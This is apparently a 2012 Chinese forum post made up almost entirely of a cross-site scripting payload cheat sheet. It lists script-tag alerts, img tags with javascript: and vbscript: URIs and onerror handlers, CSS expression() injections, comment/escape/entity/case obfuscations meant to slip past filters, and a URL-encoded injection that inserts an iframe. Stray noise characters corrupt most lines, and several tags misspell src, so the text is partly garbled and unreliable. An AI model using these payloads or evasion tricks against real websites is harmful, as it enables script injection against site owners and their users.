<script>alert("跨站")</script> (最常用)
- C/ ?" y' \( m' _. t: P% v- ]<img scr=javascript:alert("跨站")></img>
0 i/ }# }, M3 \2 s. I, G k9 @<img scr="javascript: alert(/跨站/)></img>2 q( K1 h) Z$ _% t _5 ]* {
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)' R. r$ p& A2 H+ B
<img scr="#" onerror=alert(/跨站/)></img>$ a4 \/ @7 y7 K! Q% f
<img scr="#" style="xss:expression(alert(/xss/));"></img>
: ^: J# |* G) \& b<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)' |7 w5 l" G9 J! n; B" R
<img src=vbscript:msgbox ("xss")></img>
; ?% u7 q1 w" c6 H' I9 M2 P<style> input {left:expression (alert('xss'))}</style>
' K8 E$ R, K$ E" b<div style={left:expression (alert('xss'))}></div>% d% I6 V" d# Q$ d8 [7 `4 E; w
<div style={left:exp/* */ression (alert('xss'))}></div>
/ b# j# i3 B+ a9 O! s<div style={left:\0065\0078ression (alert('xss'))}></div>+ @2 M/ @# s! C g/ ]5 u; M8 Q
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>! L6 E" \" P8 f! ~. C
unicode <div style="{left:expRessioN (alert('xss'))}">, [0 |" ~. I8 g- W( @% J
3 y* l# r& U& `3 D* g# I8 z
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["/ S2 H4 G6 F3 ^/ x% d% t- G6 x
|
发表于 2012-9-15 14:09:13
收藏
支持
反对